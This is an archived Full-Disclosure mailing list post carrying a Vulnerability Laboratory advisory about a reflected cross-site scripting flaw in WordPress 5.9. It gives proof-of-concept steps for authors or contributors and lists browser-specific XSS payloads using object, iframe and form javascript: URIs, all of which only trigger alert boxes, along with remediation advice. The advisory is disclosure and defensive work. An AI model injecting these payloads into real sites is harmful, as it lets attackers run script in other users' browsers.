lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Thu, 17 Feb 2022 12:23:17 +0100
From: "" <>
Subject: [FD] Wordpress v5.9 - Reflected Cross Site Scripting Web

Document Title:
Wordpress v5.9 - Reflected Cross Site Scripting Web Vulnerability

References (Source):

Release Date:

Vulnerability Laboratory ID (VL-ID):

Common Vulnerability Scoring System:

Vulnerability Class:
Cross Site Scripting - Non Persistent

Current Estimated Price:
1.000€ - 2.000€

Product & Service Introduction:
WordPress (WP, is a free and open-source content management system (CMS) written in PHP and paired
with a MySQL or MariaDB database. Features include a plugin architecture and a template system, referred to within
WordPress as Themes. WordPress was originally created as a blog-publishing system but has evolved to support other
web content types including more traditional mailing lists and forums, media galleries, membership sites, learning
management systems (LMS) and online stores. One of the most popular content management system solutions in use,
WordPress is used by 42.8% of the top 10 million websites as of October 2021.

(Copy of the Homepage:

Abstract Advisory Information:
An independent vulnerability  researcher discovered a reflected cross site web vulnerability in the official Wordpress v5.9 framework.

Affected Product(s):
Product: Wordpress v5.9 - Blog (PHP) (Web-Application)

Vulnerability Disclosure Timeline:
2022-02-09: Public Disclosure (Vulnerability Laboratory)

Discovery Status:

Exploitation Technique:

Severity Level:

Authentication Type:
Restricted Authentication (Moderator Privileges)

User Interaction:
Low User Interaction

Disclosure Type:
Responsible Disclosure

Technical Details & Description:
The reflected xss can be exploited when a user with the AUTHOR or CONTRIBUTOR role adds a javascript
payload in the Post's Excerpt function, whenever a user wants to use the Add Block function in their post
or page, the xss will be executed. Also the post and page editor allows executing the xss payload
directly just by copying and pasting the malicious javascript.

Proof of Concept (PoC):
The non-persistent cross site scripting web vulnerability can be exploited by remote attackers with contributor or author user account (authenticated)
and with low user interaction. For security demonstration or to reproduce the cross site web vulnerability follow the provided
information and steps below to continue.

Note: Cross-Site Scripting will be executed, since in all the sections where the editor and search engine of the
add block function can be used as well as in the post and page section of the editor with the copy and paste function.

POC1:The malicious Excerpt will be executed in the post and page sections at the moment you want to use the add new block
function and typing some name in the search engine of the add block function reflecting it in all the wordpress editor sections.

1.) Login whit user author or contributor
2.) Add new post
3.) Add Block Post Excerpt
4.) Add malicious code in the Extract function (<object data="javascript:alert(0)">) 
5.) Replicated

1.) Login whit user author
2.) Add new post
3.) Publish Post
4.) Add malicious code in the Extract function (<object data="javascript:alert(0)">) 
5.) In the post editor add a new block
6.) Search for something in the block search engine7.) Replicated

1.) Login whit user author or contributor
2.) Add new post
3.) Copy & Page (<object data="javascript:alert(0)">) in editor4.) 
4.) Replicated

Firefox Payload:
<object data="javascript:alert('xss')">
<object data=/ onload=alert(1)>
<iframe src="javascript:alert(1)">

Chrome Payload:
<form><button formaction=javascript:alert(1)>XSS
<iframe src="javascript:alert(1)">
<form action=javascript:alert(1)><input type=submit value=XSS>

Poc Image:

Poc Video

Solution - Fix & Patch:
The vulnerability can be resolved by a encode and secure parse / escape of the inputs.
In a second step the output location were the execute occurs needs to be sanitized.

Note: Wordpress is informed about the issue and is in progress to develop an update. The researcher notet to public disclose the finding immediatly.
Until the patch is available, ensure that only trusted persons have access to contributor or author roles. As alternativ it is possible
to deactivate the accounts until a patch is available.

Credits & Authors:
TaurusOmar (@TaurusOmar_) -

Disclaimer & Information:
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:  ;  ;

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.

				    Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™


Download attachment "OpenPGP_signature" of type "application/pgp-signature" (841 bytes)

Sent through the Full Disclosure mailing list
Web Archives & RSS:

Powered by blists - more mailing lists